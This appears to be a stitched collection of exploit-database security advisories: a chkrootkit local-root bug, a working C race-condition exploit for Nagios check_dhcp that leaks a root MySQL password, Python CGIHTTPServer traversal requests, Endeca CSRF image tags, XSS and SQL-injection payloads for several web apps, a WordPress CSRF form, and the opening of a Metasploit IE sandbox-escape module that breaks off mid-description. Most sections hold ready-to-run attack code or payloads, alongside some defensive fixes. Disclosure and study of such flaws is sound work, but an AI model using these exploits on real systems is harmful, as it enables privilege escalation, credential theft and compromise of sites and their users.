$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
file_port="$file_port $i"
I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.
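Review bot: the quoting fix proposed at the end, `file_port="$file_port $i"`, is the right minimal change, but the same function also runs a bare `netstat -p` in the Linux branch while the surrounding code uses `${netstat}`, `${egrep}` and `${awk}`; a script run as root should use the resolved variable consistently rather than a PATH lookup. The `${ROOTDIR}tmp/.b"a` entry, with an `a` after the closing quote, yields the filename .ba; if that is intentional it deserves a comment, because it reads like a typo. Operators can confirm whether an installed copy is affected by checking the slapper() function for the unquoted assignment `file_port=$file_port $i`, and the advisory's own mitigation, mounting /tmp noexec, applies until the fix lands.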

platforms/linux/local/33904.txt Executable file

@ -0,0 +1,240 @@
=============================================
- Release date: 28.06.2014
- Discovered by: Dawid Golunski
- Severity: Moderate
=============================================
I. VULNERABILITY
-------------------------
check_dhcp - Nagios Plugins = 2.0.2 Race Condition
II. BACKGROUND
-------------------------
"Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
Nagios Plugins (Official)
The Nagios Plugins Development Team maintains a bundle of more than fifty
standard plugins for Nagios and other monitoring applications that use the
straightforward plugin interface originally invented by the Nagios folks.
Each plugin is a stand-alone command line tool that provides a specific type
of check. Typically, your monitoring software runs these plugins to determine
the current status of hosts and services on your network.
Some of the provided plugins let you check local system metrics (such as load
averages, processes, or disk space usage), others use various network protocols
(such as ICMP, SNMP, or HTTP) to perform remote checks.
This allows for checking a large number of common host and service types.
* check_dhcp plugin
This plugin tests the availability of DHCP servers on a network."
III. INTRODUCTION
-------------------------
check_dhcp plugin (part of the official Nagios Plugins package) contained
a vulnerability that allowed a malicious attacker to read parts of INI
config files belonging to root on a local system. It allowed an attacker
to obtain sensitive information like passwords that should only be accessible
by root user.
This vulnerability was discussed in my previous advisory available at:
http://legalhackers.com/advisories/nagios-check_dhcp.txt
http://www.exploit-db.com/exploits/33387/
The vulnerability was quickly patched by vendor in the release of nagios plugins
version 2.0.2 however the security measures in the patch are not sufficient and
the code is vulnerable to Race Condition attack.
Race Condition makes it possible for an arbitrary user to read parts of a
root-owned file despite the checks.
IV. DESCRIPTION
-------------------------
Nagios Plugins 2.0.2 introduces the following checks before the SUID root check_dhcp
program accesses a file provided by a user:
-----[ lib/parse_ini.c ]-----
/* We must be able to stat() the thing. */
if (lstat(i.file, &fstat) != 0)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
/* The requested file must be a regular file. */
if (!S_ISREG(fstat.st_mode))
die(STATE_UNKNOWN, "%s\n", _("Can't read config file. Requested path is not a regular file."));
/* We must be able to read the requested file. */
if (access(i.file, R_OK|F_OK) != 0)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
/* We need to successfully open the file for reading... */
if ((inifile=fopen(i.file, "r")) == NULL)
die(STATE_UNKNOWN, "%s %s\n", _("Can't read config file."), strerror(errno));
------------------------------
A config file is only opened if it is a regular file (lstat() rejects a symlink)
and only if it is readable by the real user running the program (checked with
access(), which tests against the real UID rather than the effective root UID of
the SUID process). These checks prevent a user from reading a file they have no
permission to read, e.g.:
$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
Can't read config file. Permission denied
However, these checks are performed on the path name, while fopen() later resolves
the same path name again with root privileges; nothing ties the checked object to
the opened one, which is a classic time-of-check/time-of-use race. If an attacker
replaces the checked regular file with a symlink to /root/.my.cnf in the very short
window between the lstat()/access() checks and the fopen() call, fopen() follows
the symlink as root and the attacker still obtains the contents of the file.
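The hardening a practitioner would want closes the window rather than narrowing it. The following is an added example written for this page in Python; it is not code from Nagios Plugins and does not claim to be what the 2.0.3 fix does. It assumes a set-UID program that must open a user-supplied INI path on the real user's behalf: privileges are dropped to the real UID/GID around a single open() with O_NOFOLLOW, so the kernel performs the permission check atomically with the open, and the regular-file test is made with fstat() on the descriptor that was actually opened. The demo fixture (temporary directory, sample INI contents, symlink) is constructed here; the symlink plays the role of the /tmp/access swap in the exploit below.

```python
import errno
import os
import stat
import tempfile


def safe_open_config(path):
    """Open `path` read-only on behalf of the *real* user of a set-UID program.

    There is no check-then-use gap: the permission check happens inside
    open() with the real UID/GID in effect, O_NOFOLLOW makes open() fail if
    the final path component is a symlink (whatever it was swapped for after
    any earlier look at the path), and the regular-file test is done with
    fstat() on the descriptor that was actually opened, not lstat() on the
    path. Returns a text file object; raises OSError on refusal.
    """
    saved_euid, saved_egid = os.geteuid(), os.getegid()
    # Drop to the real user (a no-op when the process is not set-UID).
    # Order matters: set the gid while still privileged, then the uid.
    os.setegid(os.getgid())
    os.seteuid(os.getuid())
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    finally:
        # Restore privileges whatever happened: uid first, then gid.
        os.seteuid(saved_euid)
        os.setegid(saved_egid)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise OSError(errno.EINVAL, "Requested path is not a regular file", path)
    except BaseException:
        os.close(fd)
        raise
    return os.fdopen(fd, "r")


def demo_symlink_swap():
    """Constructed fixture (not from the advisory): a regular INI file opens,
    a symlink pointing at it is refused. Returns (regular_opened, symlink_refused)."""
    with tempfile.TemporaryDirectory() as d:
        regular = os.path.join(d, "access")
        link = os.path.join(d, "access-link")
        with open(regular, "w") as f:
            f.write("[mysql]\npassword=example\n")  # constructed sample content

        with safe_open_config(regular) as f:
            regular_opened = f.readline() == "[mysql]\n"

        os.symlink(regular, link)  # what the exploit swaps in after the checks
        try:
            safe_open_config(link).close()
            symlink_refused = False
        except OSError as e:
            # Linux and macOS report ELOOP for O_NOFOLLOW on a symlink, FreeBSD EMLINK
            symlink_refused = e.errno in (errno.ELOOP, errno.EMLINK)
    return regular_opened, symlink_refused


if __name__ == "__main__":
    print(demo_symlink_swap())  # (True, True)
```

Run as an unprivileged user the privilege drop is a no-op and the behaviour is the same: the symlink is refused before any content is read. If the program does not need its privileges for the rest of its work, dropping them permanently (setuid(getuid())) before touching any user-supplied path is simpler still.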
V. PROOF OF CONCEPT
-------------------------
Below is an example exploit that demonstrates this attack.
-------[ checkdhcp_race_exploit.c ]-------
/* check_dhcp 2.0.2 Arbitrary Option File Read - Race Condition Exploit */
/* Created by Dawid Golunski (dawid@legalhackers.com) */
/* http://legalhackers.com */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

#define TARGET        "/usr/local/nagios/libexec/check_dhcp"
#define PROGARGS      "--extra-opts=mysql@/tmp/access"
#define ROOT_CONFIG   "/root/.my.cnf"
#define SYMLINK_FILE  "/tmp/access"
#define MAX_DELAY     1500 // adjust if necessary

int main(int argc, char **argv)
{
    char *arg[] = {TARGET, PROGARGS, 0};
    int randomnum = 0;

    /* Create an empty, world-accessible regular file so that the
     * lstat()/S_ISREG()/access() checks in check_dhcp pass;
     * remove it first if it already exists. */
    unlink(SYMLINK_FILE);
    open(SYMLINK_FILE, O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);

    if (fork() == (pid_t)0) {
        /* Child: run the SUID check_dhcp against the regular file. */
        execvp(TARGET, arg);
    }
    else {
        /* Parent: sleep a random, short time, then swap the regular file
         * for a symlink to the root-owned config, hoping to land between
         * the checks and the fopen() call. */
        srand(time(NULL));
        randomnum = (rand() % MAX_DELAY);
        usleep(randomnum);
        unlink(SYMLINK_FILE);               /* Unlink the file */
        symlink(ROOT_CONFIG, SYMLINK_FILE); /* Create symlink */
        wait(NULL);
    }
    return 0;
}
-------------------------
Here is an example root mysql config file:
# cat /root/.my.cnf
[mysqldump]
quick
[mysql]
# saved password for the mysql root user
password=myRootSecretMysqlPass123
Here is the output of the running exploit:
$ while :; do ./checkdhcp_race_exploit; done
Invalid section 'mysql' in config file '/tmp/access'
Can't read config file. Requested path is not a regular file.
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
Can't read config file. No such file or directory
Can't read config file. Requested path is not a regular file.
Can't read config file. Requested path is not a regular file.
Can't read config file. No such file or directory
/usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
Invalid section 'mysql' in config file '/tmp/access'
Invalid section 'mysql' in config file '/tmp/access'
Invalid section 'mysql' in config file '/tmp/access'
As we can see, it succeeds after a number of failed runs: on the successful
attempt check_dhcp parsed the root-owned /root/.my.cnf and echoed the password
back in its "unrecognized option" error message.
VI. BUSINESS IMPACT
-------------------------
A malicious user with local access to a system where the check_dhcp plugin is
installed SUID root could exploit this vulnerability to read parts of any
INI-format config file owned by root and potentially extract sensitive
information such as passwords.
VII. SYSTEMS AFFECTED
-------------------------
Systems with the check_dhcp SUID binary installed as part of Nagios Plugins 2.0.2
are vulnerable.
VIII. SOLUTION
-------------------------
The vendor was informed of the vulnerability prior to the release of this advisory
and has released Nagios Plugins 2.0.3, available at:
http://nagios-plugins.org/nagios-plugins-2-0-3-released/
IX. REFERENCES
-------------------------
http://nagios-plugins.org/nagios-plugins-2-0-2-released/
http://nagios-plugins.org/nagios-plugins-2-0-3-released/
http://legalhackers.com/advisories/nagios-check_dhcp.txt
http://legalhackers.com/advisories/nagios-check_dhcp-race.txt
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
May 26th, 2014: Advisory created
June 28th, 2014: Advisory updated and released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

source: http://www.securityfocus.com/bid/39771/info
Apache ActiveMQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ActiveMQ 5.3.0 and 5.3.1 are affected; other versions may also be vulnerable.
http://www.example.com:8161/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>

source: http://www.securityfocus.com/bid/39789/info
The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Response to custom-made Scapy packets:
#####################################################################################################
fb1h2s@fb1h2s:~$ sudo scapy
[sudo] password for adminuser:
/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in Python 2.6
/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in Python 2.6
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump()
Welcome to Scapy (v1.1.1 / -)
>>> ip=IP(dst="192.168.*.*")
>>> udp=UDP(sport=4371,dport=4370)
>>> payload="Coustomcommands"
>>> packet=ip/udp/payload
>>> sniff
<function sniff at 0x9f0333c>
>>> sr1(packet)
Begin emission:
Finished to send 1 packets.
You could possibly get anything you want from the system.
BINGO :D
I am including a dump of the UDP communication with the hardware, showing the data leaked as a result of improper authentication.
...........Q[...L.WU[.....f.[...Ver 6.21 Sep 4 2008.....[...~OS.....[...~OS=1...hv[...~ExtendFmt...f>[...~ExtendFmt=0...jW[...ExtendOPLog.....[...ExtendOPLog=...X.[...~Platform.....[...~Platform=ZEM500.E..Y[...H....Q[...... .[...WorkCode....r[...WorkCode=0....E[.................F[..............3....D[..............@[.............U.........d......
MMr.K.Sug........d...e......MMr. Sant.)......e...f......MMrs. Anu/@......f...g......MMr. Kris@@......g...h......MMr. Domian......h...i......MMrs. Sho`n......i...j......MMr. B. S~)......j...k......MMs. Bhag_n......k...l......MMs. NishYn......l...m......MMr. Moha.)......m...n......
MMr. ChanXn......n...o......MMrs. Ruk^n......o...p......MMr. Prad.g......p...q......MMr. Kuma\n......q...r......MMr. Dhan[n......r...s......MMr. NirmZn......s...t......MMs. Lali1@......t...u......MMs. Nave.)......u...v......MMs. Sudh.)......v...w......
MMs. Anit2@......w...x......MMs. Poon3@......x...y......MMrs. Gee=@......y...z......MMs. Vidh<@......z...{......MMrs. BanB@......{...|......MMrs. Man]n......|...}......MMr.G.ThiWn......}...~......MMs. Indi........~..........MMrs. Jot...................MMrs. Kav...................
MMr. Thiy...................MMr. Prak.8.................MMs. Love.8.................MMr. Sund.8.................MMr. Kart.8.................MMs. Koma.8.................MMr. Prad.8.................MMr. ........MaheB`.................MMr. RajkC`.................MMr. NataD`.................MMr. ManoE`.................MMr. Varu<`.................
MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`.................MMrs.A.Us?`.................MMrs.B.KaA`.................MMs. Banu._.................MMr. Stal.@.................MMr. Chan.@.................MMr. DhanQn.................MMr. MukiRn.................MMrs. Satcn.................MMs. Gomabn.................MMr. Ramadn.................
MMrs. Geeen.................
Trimmed....
This vulnerability was checked and verified on the ZK5000 hardware model; all other versions are possibly vulnerable as well.

Advisory: Python CGIHTTPServer File Disclosure and Potential Code
Execution
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs. This may enable attackers to disclose a CGI
script's source code or execute arbitrary CGI scripts in the server's
document root.
Details
=======
Product: Python CGIHTTPServer
Affected Versions:
2.7 - 2.7.7,
3.2 - 3.2.4,
3.3 - 3.3.2,
3.4 - 3.4.1,
3.5 pre-release
Fixed Versions:
2.7 rev b4bab0788768,
3.2 rev e47422855841,
3.3 rev 5676797f3a3e,
3.4 rev 847e288d6e93,
3.5 rev f8b3bb5eb190
Vulnerability Type: File Disclosure, Directory Traversal, Code Execution
Security Risk: high
Vendor URL: https://docs.python.org/2/library/cgihttpserver.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008
Advisory Status: published
CVE: CVE-2014-4650
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650
Introduction
============
The CGIHTTPServer module defines a request-handler class, interface
compatible with BaseHTTPServer.BaseHTTPRequestHandler and inherits
behavior from SimpleHTTPServer.SimpleHTTPRequestHandler but can also
run CGI scripts.
(from the Python documentation)
More Details
============
The CGIHTTPServer module can be used to set up a simple HTTP server with
CGI scripts. A sample server script in Python may look like the
following:
------------------------------------------------------------------------
#!/usr/bin/env python2
import CGIHTTPServer
import BaseHTTPServer

if __name__ == "__main__":
    server = BaseHTTPServer.HTTPServer
    handler = CGIHTTPServer.CGIHTTPRequestHandler
    server_address = ("", 8000)
    # Note that only /cgi-bin will work:
    handler.cgi_directories = ["/cgi-bin", "/cgi-bin/subdir"]
    httpd = server(server_address, handler)
    httpd.serve_forever()
------------------------------------------------------------------------
This server should execute any scripts located in the subdirectory
"cgi-bin". A sample CGI script can be placed in that directory, for
example a script like the following:
------------------------------------------------------------------------
#!/usr/bin/env python2
import json
import sys
db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))
------------------------------------------------------------------------
The Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler
class which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:
class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    [...]
    def do_GET(self):
        """Serve a GET request."""
        f = self.send_head()
        if f:
            try:
                self.copyfile(f, self.wfile)
            finally:
                f.close()

    def do_HEAD(self):
        """Serve a HEAD request."""
        f = self.send_head()
        if f:
            f.close()

    def translate_path(self, path):
        [...]
        path = posixpath.normpath(urllib.unquote(path))
        words = path.split('/')
        words = filter(None, words)
        path = os.getcwd()
        [...]
The CGIHTTPRequestHandler class inherits, among others, the methods
do_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The
class overrides send_head() and implements several new methods, such as
do_POST(), is_cgi() and run_cgi():
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    [...]
    def do_POST(self):
        [...]
        if self.is_cgi():
            self.run_cgi()
        else:
            self.send_error(501, "Can only POST to CGI scripts")

    def send_head(self):
        """Version of send_head that support CGI scripts"""
        if self.is_cgi():
            return self.run_cgi()
        else:
            return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)

    def is_cgi(self):
        [...]
        collapsed_path = _url_collapse_path(self.path)
        dir_sep = collapsed_path.find('/', 1)
        head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]
        if head in self.cgi_directories:
            self.cgi_info = head, tail
            return True
        return False

    [...]

    def run_cgi(self):
        """Execute a CGI script."""
        dir, rest = self.cgi_info
        [...]
        # dissect the part after the directory name into a script name &
        # a possible additional path, to be stored in PATH_INFO.
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''
        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(404, "No such CGI script (%r)" % scriptname)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(403, "CGI script is not a plain file (%r)" %
                            scriptname)
            return
        [...]
    [...]
For HTTP GET requests, do_GET() first invokes send_head(). That method
calls is_cgi() to determine whether the requested path is to be executed
as a CGI script. The is_cgi() method uses _url_collapse_path() to
normalize the path, i.e. remove extraneous slashes (/), current directory
(.), or parent directory (..) elements, taking care not to permit
directory traversal below the document root. The is_cgi() function
returns True when the first path element is contained in the
cgi_directories list. As _url_collapse_path() and is_cgi() never URL
decode the path, replacing the forward slash after the CGI directory in
the URL to a CGI script with the URL encoded variant %2f leads to
is_cgi() returning False. This will make CGIHTTPRequestHandler's
send_head() then invoke its parent's send_head() method, which translates
the URL path to a file system path using the translate_path() method and
then outputs the file's contents raw. As translate_path() URL decodes
the path, this then succeeds and discloses the CGI script's file
contents:
$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys
db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))
Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI
scripts that would normally not be executable. The class normally only
allows executing CGI scripts that are direct children of one of the
directories listed in cgi_directories. Furthermore, only direct
subdirectories of the document root (the current working directory) can
be valid CGI directories.
This can be seen in the following example. Even though the sample server
shown above includes "/cgi-bin/subdir" as part of the request handler's
cgi_directories, a CGI script named test.py in that directory is not
executed:
$ curl http://localhost:8000/cgi-bin/subdir/test.py
[...]
<p>Error code 403.
<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').
[...]
Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and
returned True. Next, run_cgi() further dissected these paths to perform
some sanity checks, thereby mistakenly assuming subdir to be the
executable script's filename and test.py to be path info. As subdir is
not an executable file, run_cgi() returns an error message. However, if
the forward slash between subdir and test.py is replaced with %2f,
invoking the script succeeds:
$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{"text": "This is a Test"}
This is because neither is_cgi() nor run_cgi() URL decode the path
during processing until run_cgi() tries to determine whether the target
script is an executable file. More specifically, as subdir%2ftest.py
does not contain a forward slash, it is not split into the script name
subdir and path info test.py, as in the previous example.
Similarly, using URL encoded forward slashes, executables outside of a
CGI directory can be executed:
$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{"text": "This is a Test"}
Workaround
==========
Subclass CGIHTTPRequestHandler and override the is_cgi() method with a
variant that first URL decodes the supplied path, for example:
import urllib
import CGIHTTPServer

class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
    def is_cgi(self):
        # URL-decode before the CGI-directory check, so that %2f cannot
        # hide a path separator from it
        self.path = urllib.unquote(self.path)
        return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)
Fix
===
Update to the latest Python version from the Mercurial repository at
http://hg.python.org/cpython/
Security Risk
=============
The vulnerability can be used to gain access to the contents of CGI
binaries or the source code of CGI scripts. This may reveal sensitve
information, for example access credentials. This can greatly help
attackers in mounting further attacks and is therefore considered to
pose a high risk. Furthermore attackers may be able to execute code that
was not intended to be executed. However, this is limited to files
stored in the server's working directory or in its subdirectories.
The CGIHTTPServer code does contain this warning:
"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"
Even when used on a local computer this may allow other local users to
execute code in the context of another user.
Timeline
========
2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure to vendor
2014-06-11 Vendor notified
2014-06-15 Vendor disclosed vulnerability in their public bug tracker
and addressed it in public source code repository
2014-06-23 CVE number requested
2014-06-25 CVE number assigned
2014-06-26 Advisory released
References
==========
http://bugs.python.org/issue21766
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Advisory: Endeca Latitude Cross-Site Request Forgery
RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely.
Details
=======
Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE: CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399
Introduction
============
Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.
(from the vendor's homepage)
More Details
============
Endeca Latitude offers administrators the ability to perform different
administrative and configuration operations by accessing URLs.
These URLs are not secured by a randomly generated token and therefore
are prone to Cross-Site Request Forgery attacks.
For example by accessing the URL http://example.com/admin?op=exit an
administrator can shut down the Endeca Latitude instance. Several other
URLs exist (as documented at [1] and [2]) which can be used to trigger
operations such as flushing caches or changing the logging settings.
Proof of Concept
================
An attacker might prepare a website, which can trigger arbitrary
functionality (see [1] and [2]) of an Endeca Latitude instance if
someone opens the attacker's website in a browser that can reach Endeca
Latitude. An easy way to implement this is to embed a hidden image into
an arbitrary website which uses the corresponding URL as its source:
<img src="http://example.com/admin?op=exit" style="display:hidden" />
<img src="http://example.com/config?op=log-disable" style="display:hidden" />
[...]
Workaround
==========
The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.
Fix
===
Not available. The vendor did not update the vulnerable software to
remedy this issue.
Security Risk
=============
The vulnerability enables attackers to interact with an Endeca Latitude
instance in different ways. Possible attacks include the
changing of settings as well as denying service by shutting down a
running instance. Attackers mainly benefit from this vulnerability if
the instance is not already available to them, but for example only to
restricted IP addresses or after authentication. Since this makes it
harder to identify potential target systems and the attack mainly allows
to disturb the service until it is re-started, the risk of this
vulnerability is considered to be low.
Timeline
========
2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
CPU
2014-03-13 Vendor responded with additional information about a
potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released
References
==========
[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations
[2] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables

source: http://www.securityfocus.com/bid/39749/info
ProArcadeScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search.php?searchstr= [XSS]

platforms/php/webapps/33889.txt
source: http://www.securityfocus.com/bid/39756/info
SmartBlog is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SmartBlog 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/v1.3/?mois=%2527&an=2010
http://www.example.com/v1.3/commentaire.php?id='
http://www.example.com/v1.3/?mois=3&an=>"><ScRiPt>alert(213771818860)</ScRiPt>

platforms/php/webapps/33896.txt
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary JavaScript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
Proof of concept
================
If a logged-in administrator clicks the submit button on this form, a JavaScript alert will display on the homepage. (In a real attack the form can be made to auto-submit using JavaScript.)
<form action=\"http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder\" method=\"POST\">
<input type=\"hidden\" name=\"ssba_options\" value=\"save\">
<input type=\"checkbox\" name=\"ssba_homepage\" value=\"Y\">
<input type=\"text\" name=\"ssba_text_placement\" value= \"below\">
<input type=\"text\" name=\"ssba_before_or_after\" value= \"after\">
<input type=\"text\" name=\"ssba_share_text\" value=\"<script>alert(\'foo\')</script>\">
<input type=\"submit\">
</form>
Mitigations
================
Immediately upgrade to version 4.5 or greater.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
================
2014-06-19: Discovered
2014-06-25: Reported to WP.org and author via email
2014-06-26: Author reports issue fixed in version 4.5
Discovered by dxw:
================
Duncan Stuart
Please visit security.dxw.com for more information.

platforms/php/webapps/33906.txt
source: http://www.securityfocus.com/bid/39778/info
velBox is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
velBox 1.2 is vulnerable; other versions may also be affected.
The following example data is available:
http://www.example.com/velBox-cms-p30vel/admin/
javascript:document.cookie="login_admin=true;path=/"

platforms/php/webapps/33908.txt
source: http://www.securityfocus.com/bid/39796/info
Article Directory Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available :
Inject the following into the login options field.
' or 1=1 or ''='

platforms/php/webapps/33909.txt
source: http://www.securityfocus.com/bid/39799/info
The Tele Data's Contact Management Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also be affected.
The following proof-of-concept code is available:
javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

platforms/windows/local/33892.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::FileInfo
include Msf::Post::File
NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}
def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
